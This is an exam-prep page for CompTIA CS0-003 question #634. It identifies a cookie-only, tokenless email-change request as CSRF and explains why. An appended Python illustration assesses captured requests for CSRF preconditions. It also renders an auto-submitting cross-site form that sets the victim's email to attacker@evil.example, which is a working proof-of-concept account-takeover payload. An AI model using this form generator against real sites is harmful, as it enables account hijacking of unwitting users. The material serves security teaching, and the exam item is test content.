CS0-003 · Question #634
The correct answer is B: CSRF.
Question
A security analyst is testing a web application for vulnerabilities using Burp Suite. During the assessment, a capture of the following HTTP request and response is shown in the command-line interface:

After inspecting the request, the security analyst notices that it does not include any additional protections or validation mechanisms. Which of the following vulnerabilities is most likely present in the web application?
Options
- A. IDOR
- B. CSRF
- C. SQLi
- D. XSS
Explanation
The request performs a sensitive, state-changing account action (updating an email address) and is authenticated only by a session cookie, which the browser attaches automatically to every request to that origin. It carries no CSRF token, no custom request header, and nothing else that ties the request to a page the application itself served. When state-changing requests lack anti-CSRF protections, an attacker can have a victim's browser submit an identical request from a page the attacker controls, with the victim's cookie attached and without the victim's knowledge, making CSRF the most likely vulnerability. The other options would need different evidence: IDOR shows up as an object identifier the user can alter to reach another account's data, while SQLi and XSS require an injected payload; the observation here is the absence of request validation, not a payload.
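As an added illustration (not part of the exam page or its explanation), the following Python script applies the reasoning above to a raw request of the kind Burp captures: it checks the four preconditions for CSRF that are visible in the request text (state-changing method, cookie-only authentication, a body a plain HTML form can send, and no anti-CSRF token) and renders the auto-submitting cross-site form an attacker's page would host. The request text, host, path, cookie name and parameter names are constructed for the example and are assumptions, not the exam's actual capture.

```python
import re
from html import escape
from urllib.parse import parse_qsl

# Constructed capture modelled on the request the question describes. The host,
# path, cookie name and field name are assumptions, not taken from the exam.
VULNERABLE_REQUEST = (
    "POST /account/email HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "Cookie: session=6f1c9a2e\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 26\r\n"
    "\r\n"
    "email=victim%40example.com"
)

# Constructed hardened variant: a per-session token in a custom header and a
# JSON body, neither of which a cross-site <form> can produce.
HARDENED_REQUEST = (
    "POST /account/email HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "Cookie: session=6f1c9a2e\r\n"
    "Origin: https://app.example\r\n"
    "X-CSRF-Token: 3b9d0c4e8a7f\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"email": "victim@example.com"}'
)

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
# Media types a browser sends from a <form> without a CORS preflight.
SIMPLE_TYPES = {"application/x-www-form-urlencoded", "multipart/form-data", "text/plain"}
# Heuristic names for anti-CSRF tokens in headers or form fields.
TOKEN_NAME = re.compile(r"csrf|xsrf|forgery|authenticity", re.I)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method.upper(), "target": target, "headers": headers, "body": body}


def assess(raw):
    """Return the CSRF preconditions visible in the request and an overall verdict."""
    req = parse_request(raw)
    hdr = req["headers"]
    media = hdr.get("content-type", "text/plain").split(";")[0].strip().lower()
    has_token = any(TOKEN_NAME.search(name) for name in hdr) or any(
        TOKEN_NAME.search(name) for name, _ in parse_qsl(req["body"]))
    flags = {
        "state_changing": req["method"] in STATE_CHANGING,
        # A bearer token in Authorization is not attached by the browser cross-site.
        "cookie_auth": "cookie" in hdr and "authorization" not in hdr,
        "form_sendable": media in SIMPLE_TYPES,
        "no_token": not has_token,
    }
    flags["csrf_candidate"] = all(flags.values())
    return flags


def poc_form(raw, overrides=None):
    """Render the self-submitting form an attacker's page would host. The victim's
    browser adds the session cookie itself; the attacker supplies only the new values."""
    req = parse_request(raw)
    fields = dict(parse_qsl(req["body"]))
    fields.update(overrides or {})
    action = "https://" + req["headers"]["host"] + req["target"]
    inputs = "".join(
        f'<input type="hidden" name="{escape(n, quote=True)}" value="{escape(v, quote=True)}">'
        for n, v in fields.items())
    return (f'<form id="f" method="{req["method"]}" action="{action}">{inputs}</form>'
            '<script>document.getElementById("f").submit()</script>')


if __name__ == "__main__":
    for label, raw in (("vulnerable", VULNERABLE_REQUEST), ("hardened", HARDENED_REQUEST)):
        print(label, assess(raw))
    print(poc_form(VULNERABLE_REQUEST, {"email": "attacker@evil.example"}))
```

Two things the request alone cannot tell an analyst: whether the server validates the Origin or Referer header, and whether the session cookie was issued with SameSite=Lax or Strict (that attribute lives in the Set-Cookie response header, not in the request). The check that settles it is to replay the captured request from Burp Repeater with the token removed and the Origin changed or dropped, and confirm the server still performs the update.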